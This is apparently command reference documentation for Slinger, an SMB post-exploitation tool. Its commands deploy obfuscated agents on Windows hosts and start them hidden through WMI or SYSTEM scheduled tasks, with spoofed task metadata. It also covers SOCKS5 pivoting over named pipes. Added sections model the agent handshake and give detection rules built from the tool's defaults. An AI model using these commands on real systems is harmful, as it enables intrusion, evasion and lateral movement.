Description: Upload and execute polymorphic agent on target system via SMB
Help:
usage: agent deploy [-h] --path PATH --name NAME [--start]
[--method {wmiexec,atexec}] [--pipe PIPE] [--sp PATH]
[--sn NAME] [--tn NAME] [--ta AUTHOR] [--td DESC]
[--tf FOLDER] [-w SECS]
agent_path
Upload and execute polymorphic agent on target system via SMB
Example Usage:
Examples:
agent deploy ./agent.exe --path temp\ --name myagent # Upload only (no start)
agent deploy ./agent.exe --path temp\ --name myagent --start # Deploy and start with wmiexec (default)
agent deploy ./agent.exe --path temp\ --name myagent --start --method atexec # Deploy and start with Task Scheduler
agent deploy ./agent.exe --path temp\ --name myagent --start --method atexec --ta "SYSTEM" --td "Update Service"
Note: --method, --ta, --td, --tf and other atexec options only apply with --method atexec.
They are ignored when using the default wmiexec method.
Arguments
agent_path: Path to the agent executable to deploy
path: Target path relative to current share (e.g., temp, Windows\Temp)
name: Name for deployed agent on target (e.g., updater, winlogon)
method: Execution method to start agent (default: wmiexec). Only used with --start
- Choices: wmiexec, atexec
- Default: wmiexec
pipe: Specify pipe name for the agent (must match build-time pipe name)
sp: Directory on target to save command output (default: auto per share). Should be reachable from the connected share
- Default: \Users\Public\Downloads\
sn: Filename for command output (default: random)
tn: Scheduled task name (default: auto-generated)
ta: Task author for OPSEC (default: Slinger)
- Default: Slinger
td: Task description for OPSEC (default: Slinger Task)
- Default: Slinger Task
tf: Task Scheduler folder (default: \Windows)
- Default: \Windows
wait: Seconds to wait for task completion (default: 2)
- Default: 2
- Required: No
agent list
Description: Show all deployed agents and their status
Help:
usage: agent list [-h] [--host HOST] [--del DELETE_AGENT]
[-f {table,list,json}]
Show all deployed agents and their status
Example Usage:
Example: agent list -f json
Arguments
host: Filter agents by host
delete_agent: Remove agent from registry by ID (use 'all' to remove all agents)
format: Output format (default: table)
- Choices: table, list, json
- Default: table
- Required: No
agent rename
Description: Change the ID of a deployed agent in the registry
Help:
usage: agent rename [-h] --old OLD --new NEW
Change the ID of a deployed agent in the registry
Example Usage:
Example: agent rename --old slinger_abc123 --new my_agent
Arguments
old: Current agent ID
new: New agent ID
- Required: Yes
agent check
Description: Verify if the agent process is still running via WMI query
Help:
usage: agent check [-h] agent_id
Verify if the agent process is still running via WMI query
Example Usage:
Example: agent check slinger_abc123
Arguments
agent_id: Agent ID to check
- Required: Yes
agent use
Description: Connect to and interact with a deployed agent via named pipe.
ENCRYPTION & SESSION SECURITY: Agents built with --pass use AES-256-GCM encryption with HMAC-SHA256 authentication. Each session uses unique encryption keys:
- Agent generates random 16-byte nonce when you connect
- Client proves knowledge of passphrase via HMAC-SHA256 challenge-response
- Both derive session key using PBKDF2-HMAC-SHA256(passphrase_hash, nonce, 10k iterations)
- All commands in the session are encrypted with AES-256-GCM using this key
FORWARD SECRECY: Each session gets a new random nonce and unique session key. Compromising one session does NOT affect past or future sessions. To refresh encryption keys, exit and reconnect for a new session.
INTERACTIVE SHELL COMMANDS:
help - Show available commands
exit/quit - Close session and disconnect from agent
Help:
usage: agent use [-h] [--timeout TIMEOUT] [--no-colors] agent_id
Connect to and interact with a deployed agent via named pipe.
ENCRYPTION & SESSION SECURITY:
Agents built with --pass use AES-256-GCM encryption with HMAC-SHA256
authentication. Each session uses unique encryption keys:
1. Agent generates random 16-byte nonce when you connect
2. Client proves knowledge of passphrase via HMAC-SHA256 challenge-response
3. Both derive session key using PBKDF2-HMAC-SHA256(passphrase_hash,
nonce, 10k iterations)
4. All commands in the session are encrypted with AES-256-GCM using this key
FORWARD SECRECY: Each session gets a new random nonce and unique session
key. Compromising one session does NOT affect past or future sessions.
To refresh encryption keys, exit and reconnect for a new session.
INTERACTIVE SHELL COMMANDS:
help - Show available commands
exit/quit - Close session and disconnect from agent
<command> - Execute any Windows command on the agent
Example Usage:
Example: agent use agent_12345 --no-colors
Arguments
agent_id: Agent ID to connect to
timeout: Connection timeout in seconds (default: 30)
- Default: 30
- Required: No
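The four handshake steps in the help text above, modelled for anyone reviewing the design. This is an added example, not Slinger's code: the page does not say how passphrase_hash is computed or what the HMAC covers, so SHA-256 of the passphrase and an HMAC over the nonce are assumptions, and AES-256-GCM itself is left out. It shows that the session key is a pure function of the passphrase and the nonce, so the separation between sessions holds only while the passphrase stays secret.

```python
import hashlib
import hmac
import os

NONCE_LEN = 16               # page: agent generates a random 16-byte nonce
PBKDF2_ITERATIONS = 10_000   # page: "10k iterations"
KEY_LEN = 32                 # 256-bit key, the size AES-256-GCM needs


def passphrase_hash(passphrase: str) -> bytes:
    # Assumption: the page does not define passphrase_hash; SHA-256 is used here.
    return hashlib.sha256(passphrase.encode("utf-8")).digest()


def challenge_response(pw_hash: bytes, nonce: bytes) -> bytes:
    # Assumption: the proof is HMAC-SHA256 keyed with passphrase_hash over the nonce.
    return hmac.new(pw_hash, nonce, hashlib.sha256).digest()


def verify_response(pw_hash: bytes, nonce: bytes, response: bytes) -> bool:
    # Constant-time comparison so the check does not leak how many bytes matched.
    return hmac.compare_digest(challenge_response(pw_hash, nonce), response)


def derive_session_key(pw_hash: bytes, nonce: bytes) -> bytes:
    # Page: PBKDF2-HMAC-SHA256(passphrase_hash, nonce, 10k iterations).
    return hashlib.pbkdf2_hmac("sha256", pw_hash, nonce,
                               PBKDF2_ITERATIONS, dklen=KEY_LEN)


def run_session(agent_passphrase: str, client_passphrase: str, nonce: bytes = None):
    """Model one connection. Returns (authenticated, agent_key, client_key, nonce)."""
    if nonce is None:
        nonce = os.urandom(NONCE_LEN)                       # step 1: fresh nonce
    agent_hash = passphrase_hash(agent_passphrase)
    client_hash = passphrase_hash(client_passphrase)
    response = challenge_response(client_hash, nonce)       # step 2: client proof
    if not verify_response(agent_hash, nonce, response):    # step 2: agent check
        return False, None, None, nonce
    agent_key = derive_session_key(agent_hash, nonce)       # step 3: both sides
    client_key = derive_session_key(client_hash, nonce)
    return True, agent_key, client_key, nonce


if __name__ == "__main__":
    pw = "Constructed-Passphrase-1"   # constructed sample value
    ok1, key1, _, nonce1 = run_session(pw, pw)
    ok2, key2, _, _ = run_session(pw, pw)
    print("authenticated:", ok1, ok2)
    print("keys differ between sessions:", key1 != key2)
    # Anyone holding the passphrase and a recorded nonce gets the same key back.
    print("key recomputed from passphrase + nonce:",
          derive_session_key(passphrase_hash(pw), nonce1) == key1)
    print("wrong passphrase rejected:", not run_session(pw, "other")[0])
```
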
agent start
Description: Start a stopped or crashed agent using its deployment information
Help:
usage: agent start [-h] [--method {wmiexec,atexec}] [--sp PATH] [--sn NAME]
[--tn NAME] [--ta AUTHOR] [--td DESC] [--tf FOLDER]
[-w SECS]
agent_id
Start a stopped or crashed agent using its deployment information
Example Usage:
Examples:
agent start slinger_abc123 # Start using wmiexec (default)
agent start slinger_abc123 --method atexec # Start using Task Scheduler
agent start slinger_abc123 --method atexec --ta "SYSTEM" --td "Maintenance Task"
Execution details:
wmiexec - Win32_Process.Create with ShowWindow=0 (hidden window)
atexec - Task Scheduler with cmd.exe /C start /B (no new window)
Task runs as SYSTEM in session 0 (non-interactive)
Note: --ta, --td, --tf and other atexec options only apply with --method atexec.
They are ignored when using the default wmiexec method.
Both methods save output to a temp file on target and retrieve it via SMB.
--sp should be reachable from the connected share.
Arguments
agent_id: Agent ID to start
method: Execution method to start agent (default: wmiexec)
- Choices: wmiexec, atexec
- Default: wmiexec
sp: Directory on target to save command output (default: auto per share). Should be reachable from the connected share
- Default: \Users\Public\Downloads\
sn: Filename for command output (default: random)
tn: Scheduled task name (default: auto-generated)
ta: Task author for OPSEC (default: Slinger)
- Default: Slinger
td: Task description for OPSEC (default: Slinger Task)
- Default: Slinger Task
tf: Task Scheduler folder (default: \Windows)
- Default: \Windows
wait: Seconds to wait for task completion (default: 2)
- Default: 2
- Required: No
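For defenders, the execution details and defaults documented above (pipe names, task author and description, cmd.exe /C start /B, CommandLineEventConsumer, scripts staged in C:\Windows\Temp) map onto standard Windows telemetry: Sysmon events 1, 17, 18 and 20 and Security event 4698. The triage sketch below is an added example, not part of Slinger; the flat field names are an assumed normalization (Author, Description and Command would be parsed from the 4698 task XML), WmiPrvSE.exe as the parent of Win32_Process.Create children is general Windows behaviour rather than something this page states, and every sample event is constructed.

```python
import re

# Defaults documented on this page. Each can be changed with a flag, so a match
# is strong evidence, and the behavioural rules below do not depend on them.
DEFAULT_PIPES = {"\\slinger", "\\slingproxy"}
DEFAULT_AUTHOR, DEFAULT_DESC = "slinger", "slinger task"
TEMP_SCRIPT = re.compile(r"c:\\windows\\temp\\\S+?\.(?:bat|ps1)\b", re.I)
START_B = re.compile(r"\bcmd(?:\.exe)?\s+/c\s+start\s+/b\b", re.I)
SHELLS = ("\\cmd.exe", "\\powershell.exe")


def classify(ev):
    """Return [(severity, reason)] for one normalized event (field names assumed)."""
    out = []
    key = (ev.get("source"), ev.get("event_id"))
    if key in (("sysmon", 17), ("sysmon", 18)):            # pipe created / connected
        if ev.get("PipeName", "").lower() in DEFAULT_PIPES:
            out.append(("high", "default pipe name"))
    elif key == ("security", 4698):                          # scheduled task created
        if (ev.get("Author", "").lower() == DEFAULT_AUTHOR
                or ev.get("Description", "").lower() == DEFAULT_DESC):
            out.append(("high", "default task author/description"))
        if START_B.search(ev.get("Command", "")):
            out.append(("medium", "task runs cmd.exe /C start /B"))
    elif key == ("sysmon", 20):                              # WMI event consumer
        if ev.get("Type") == "Command Line":
            staged = TEMP_SCRIPT.search(ev.get("Destination", ""))
            out.append(("high" if staged else "medium",
                        "CommandLineEventConsumer created"))
    elif key == ("sysmon", 1):                               # process creation
        if (ev.get("ParentImage", "").lower().endswith("\\wmiprvse.exe")
                and ev.get("Image", "").lower().endswith(SHELLS)):
            out.append(("medium", "shell spawned by WmiPrvSE.exe"))
    return out


def triage(events):
    """Flatten findings to (host, severity, reason), high severity first."""
    rows = [(ev["host"], sev, why) for ev in events for sev, why in classify(ev)]
    return sorted(rows, key=lambda r: (r[1] != "high", r[0], r[2]))


# Constructed sample events; hosts, paths and file names are placeholders.
SAMPLE_EVENTS = [
    {"source": "sysmon", "event_id": 17, "host": "WS01", "PipeName": "\\slinger"},
    {"source": "sysmon", "event_id": 17, "host": "WS01", "PipeName": "\\wkssvc"},
    {"source": "security", "event_id": 4698, "host": "WS02", "Author": "Slinger",
     "Description": "Slinger Task", "Command": "cmd.exe /C start /B <constructed>"},
    # Author and description overridden, as in the page's --ta/--td example.
    {"source": "security", "event_id": 4698, "host": "WS03", "Author": "SYSTEM",
     "Description": "Update Service", "Command": "cmd.exe /C start /B <constructed>"},
    {"source": "sysmon", "event_id": 20, "host": "WS04", "Type": "Command Line",
     "Destination": "cmd.exe /c C:\\Windows\\Temp\\a1b2c3.bat"},
    {"source": "sysmon", "event_id": 1, "host": "WS05",
     "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe"},
    {"source": "sysmon", "event_id": 1, "host": "WS05",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe"},
]

if __name__ == "__main__":
    for host, severity, reason in triage(SAMPLE_EVENTS):
        print(f"{severity:6} {host}  {reason}")
```

The medium-severity rules will also fire on legitimate management tooling that uses WMI or scheduled tasks, so they are best baselined per environment before alerting on them.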
agent kill
Description: Find and terminate the agent process using taskkill via WMI or Task Scheduler
Help:
usage: agent kill [-h] [--method {wmiexec,atexec}] [--sp PATH] [--sn NAME]
[--tn NAME] [--ta AUTHOR] [--td DESC] [--tf FOLDER]
[-w SECS]
agent_id
Find and terminate the agent process using taskkill via WMI or Task Scheduler
Example Usage:
Examples:
agent kill slinger_abc123 # Kill using wmiexec (default)
agent kill slinger_abc123 --method atexec # Kill using Task Scheduler
agent kill slinger_abc123 --method atexec -w 3 # Wait 3 seconds for task completion
agent kill slinger_abc123 --method atexec --ta "SYSTEM" --td "Maintenance Task"
Note: --ta, --td, --tf and other atexec options only apply with --method atexec.
They are ignored when using the default wmiexec method.
Both methods save output to a temp file on target and retrieve it via SMB.
--sp should be reachable from the connected share.
Arguments
agent_id: Agent ID to kill
method: Execution method for taskkill (default: wmiexec)
- Choices: wmiexec, atexec
- Default: wmiexec
sp: Directory on target to save command output (default: auto per share). Should be reachable from the connected share
- Default: \Users\Public\Downloads\
sn: Filename for command output (default: random)
tn: Scheduled task name (default: auto-generated)
ta: Task author for OPSEC (default: Slinger)
- Default: Slinger
td: Task description for OPSEC (default: Slinger Task)
- Default: Slinger Task
tf: Task Scheduler folder (default: \Windows)
- Default: \Windows
wait: Seconds to wait for task completion (default: 2)
- Default: 2
- Required: No
agent rm
Description: Delete the agent executable file and update registry status
Help:
usage: agent rm [-h] agent_id
Delete the agent executable file and update registry status
Example Usage:
Example: agent rm slinger_abc123
Arguments
agent_id: Agent ID to remove
- Required: Yes
agent reset
Description: Kill all running agent processes and delete all agent files
Help:
usage: agent reset [-h] [--method {wmiexec,atexec}] [--sp PATH] [--sn NAME]
[--tn NAME] [--ta AUTHOR] [--td DESC] [--tf FOLDER]
[-w SECS]
Kill all running agent processes and delete all agent files
Example Usage:
Examples:
agent reset # Reset using wmiexec (default)
agent reset --method atexec # Reset using Task Scheduler
agent reset --method atexec -w 3 # Wait 3 seconds for task completion
Note: --ta, --td, --tf and other atexec options only apply with --method atexec.
They are ignored when using the default wmiexec method.
Both methods save output to a temp file on target and retrieve it via SMB.
--sp should be reachable from the connected share.
Arguments
method: Execution method for kill operations (default: wmiexec)
- Choices: wmiexec, atexec
- Default: wmiexec
sp: Directory on target to save command output (default: auto per share). Should be reachable from the connected share
- Default: \Users\Public\Downloads\
sn: Filename for command output (default: random)
tn: Scheduled task name (default: auto-generated)
ta: Task author for OPSEC (default: Slinger)
- Default: Slinger
td: Task description for OPSEC (default: Slinger Task)
- Default: Slinger Task
tf: Task Scheduler folder (default: \Windows)
- Default: \Windows
wait: Seconds to wait for task completion (default: 2)
- Default: 2
- Required: No
agent update
Description: Update the agent's file path in the registry
Help:
usage: agent update [-h] --path PATH agent_id
Update the agent's file path in the registry
Example Usage:
Example: agent update slinger_abc123 --path c:\new\path\agent.exe
Arguments
agent_id: Agent ID to update
path: New file path for the agent
- Required: Yes
proxy
Description: Build, deploy, and connect to SOCKS5 proxy binaries that tunnel traffic through SMB named pipes. No new ports opened on target.
Help:
usage: proxy [-h] ACTION ...
Build, deploy, and connect to SOCKS5 proxy binaries that tunnel traffic through SMB named pipes. No new ports opened on target.
Example Usage:
Examples:
proxy build --arch x64 --pipe myproxy --pass s3cret # Build proxy binary
proxy deploy ./proxy.exe --name myproxy --start # Upload and start
proxy connect myproxy --port 1080 # Start local SOCKS5 listener
proxy stop myproxy # Kill proxy process
proxy rm myproxy # Delete proxy file
proxy list # List deployed proxies
Usage with proxychains:
1. proxy connect myproxy --port 1080
2. Edit /etc/proxychains.conf: socks5 127.0.0.1 1080
3. proxychains nmap -sT 10.10.10.0/24
Note: Proxy binary communicates over existing SMB connection (port 445).
No additional ports are opened on the target.
Subcommands
proxy build
Description: Cross-compile a SOCKS5 proxy binary for Windows targets. Uses the same polymorphic obfuscation as the agent build system.
Help:
usage: proxy build [-h] [--arch {x86,x64,both}] [--pipe PIPE]
[--pass PASSPHRASE] [--obfuscate] [--upx UPX]
[--name CUSTOM_NAME] [--debug] [--dry-run]
Cross-compile a SOCKS5 proxy binary for Windows targets. Uses the same polymorphic obfuscation as the agent build system.
Example Usage:
Examples:
proxy build --arch x64 # Basic x64 proxy
proxy build --arch x64 --pipe myproxy --pass s3cret # With auth
proxy build --arch x64 --obfuscate # Maximum obfuscation
proxy build --arch both --pipe tunnel # Build x86 + x64
Arguments
arch: Target architecture (default: x64)
- Choices: x86, x64, both
- Default: x64
pipe: Named pipe name on target (default: slingproxy)
- Default: slingproxy
passphrase: Passphrase for encrypted pipe communication
upx: Path to UPX binary for compression
custom_name: Custom output binary name
- Required: No
proxy deploy
Description: Upload proxy binary to the remote target via SMB.
Help:
usage: proxy deploy [-h] --name NAME [--path PATH] [--start]
[--method {wmiexec,atexec}] [--pipe PIPE] [--sp PATH]
[--sn NAME] [--tn NAME] [--ta AUTHOR] [--td DESC]
[--tf FOLDER] [-w SECS]
proxy_file
Upload proxy binary to the remote target via SMB.
Example Usage:
Examples:
proxy deploy ./proxy.exe --name myproxy # Upload only
proxy deploy ./proxy.exe --name myproxy --start # Upload and start
proxy deploy ./proxy.exe --path "\Temp\" --name myproxy # Custom path
proxy deploy ./proxy.exe --name myproxy --start --method atexec # Start via Task Scheduler
Execution details (--start):
wmiexec - Win32_Process.Create with ShowWindow=0 (hidden window)
atexec - Task Scheduler with cmd.exe /C start /B (no new window)
Arguments
proxy_file: Path to proxy binary file
name: Name for deployed proxy on target
path: Remote directory to upload to (default: auto per share)
method: Execution method to start proxy (default: wmiexec)
- Choices: wmiexec, atexec
- Default: wmiexec
pipe: Pipe name (must match build-time pipe name)
sp: Directory on target to save command output (default: auto per share). Should be reachable from the connected share
- Default: \Users\Public\Downloads\
sn: Filename for command output (default: random)
tn: Scheduled task name (default: auto-generated)
ta: Task author for OPSEC (default: Slinger)
- Default: Slinger
td: Task description for OPSEC (default: Slinger Task)
- Default: Slinger Task
tf: Task Scheduler folder (default: \Windows)
- Default: \Windows
wait: Seconds to wait for task completion (default: 2)
- Default: 2
- Required: No
proxy connect
Description: Connect to a deployed proxy via named pipe and start a local SOCKS5 server for tunneling traffic.
Help:
usage: proxy connect [-h] [--pass PASSPHRASE] [--port PORT] [--bind BIND]
proxy_id
Connect to a deployed proxy via named pipe and start a local SOCKS5 server for tunneling traffic.
Example Usage:
Examples:
proxy connect myproxy # Default port 1080
proxy connect myproxy --port 9050 # Custom port
proxy connect myproxy --pass s3cret # Auth (must match build --pass)
proxy connect myproxy --bind 0.0.0.0 # Listen on all interfaces
Arguments
proxy_id: Proxy name or ID to connect to
passphrase: Passphrase for authentication (must match build --pass)
port: Local SOCKS5 port (default: 1080)
- Default: 1080
bind: Local bind address (default: 127.0.0.1)
- Default: 127.0.0.1
- Required: No
proxy use
Description: Return to the proxy interactive shell after using 'back'.
Help:
usage: proxy use [-h] proxy_id
Return to the proxy interactive shell after using 'back'.
Example Usage:
Examples:
proxy use myproxy # Re-enter proxy subshell
Arguments
proxy_id: Proxy name to re-enter
- Required: Yes
proxy start
Description: Start a previously deployed proxy using its deployment information.
Help:
usage: proxy start [-h] [--method {wmiexec,atexec}] [--sp PATH] [--sn NAME]
[--tn NAME] [--ta AUTHOR] [--td DESC] [--tf FOLDER]
[-w SECS]
proxy_id
Start a previously deployed proxy using its deployment information.
Example Usage:
Examples:
proxy start myproxy # Start using wmiexec (default)
proxy start myproxy --method atexec # Start using Task Scheduler
Execution details:
wmiexec - Win32_Process.Create with ShowWindow=0 (hidden window)
atexec - Task Scheduler with cmd.exe /C start /B (no new window)
Task runs as SYSTEM in session 0 (non-interactive)
Note: --ta, --td, --tf and other atexec options only apply with --method atexec.
They are ignored when using the default wmiexec method.
Arguments
proxy_id: Proxy name or ID to start
method: Execution method to start proxy (default: wmiexec)
- Choices: wmiexec, atexec
- Default: wmiexec
sp: Directory on target to save command output (default: auto per share). Should be reachable from the connected share
- Default: \Users\Public\Downloads\
sn: Filename for command output (default: random)
tn: Scheduled task name (default: auto-generated)
ta: Task author for OPSEC (default: Slinger)
- Default: Slinger
td: Task description for OPSEC (default: Slinger Task)
- Default: Slinger Task
tf: Task Scheduler folder (default: \Windows)
- Default: \Windows
wait: Seconds to wait for task completion (default: 2)
- Default: 2
- Required: No
proxy stop
Description: Kill the proxy process on the remote target using taskkill.
Help:
usage: proxy stop [-h] [--method {wmiexec,atexec}] [--sp PATH] [--sn NAME]
[--tn NAME] [--ta AUTHOR] [--td DESC] [--tf FOLDER]
[-w SECS]
proxy_id
Kill the proxy process on the remote target using taskkill.
Example Usage:
Execution details:
wmiexec - taskkill /F /IM via Win32_Process.Create (ShowWindow=0)
atexec - taskkill /F /IM via Task Scheduler (cmd.exe /C start /B)
Arguments
proxy_id: Proxy name or ID to stop
method: Execution method for taskkill (default: wmiexec)
- Choices: wmiexec, atexec
- Default: wmiexec
sp: Directory on target to save command output (default: auto per share). Should be reachable from the connected share
- Default: \Users\Public\Downloads\
sn: Filename for command output (default: random)
tn: Scheduled task name (default: auto-generated)
ta: Task author for OPSEC (default: Slinger)
- Default: Slinger
td: Task description for OPSEC (default: Slinger Task)
- Default: Slinger Task
tf: Task Scheduler folder (default: \Windows)
- Default: \Windows
wait: Seconds to wait for task completion (default: 2)
- Default: 2
- Required: No
proxy rm
Description: Delete the proxy binary file from the remote target.
Help:
usage: proxy rm [-h] proxy_id
Delete the proxy binary file from the remote target.
Arguments
proxy_id: Proxy name or ID to remove
- Required: Yes
proxy list
Description: Show all deployed proxies and their status.
Help:
usage: proxy list [-h] [-f {table,json}]
Show all deployed proxies and their status.
Arguments
format: Output format (default: table)
- Choices: table, json
- Default: table
- Required: No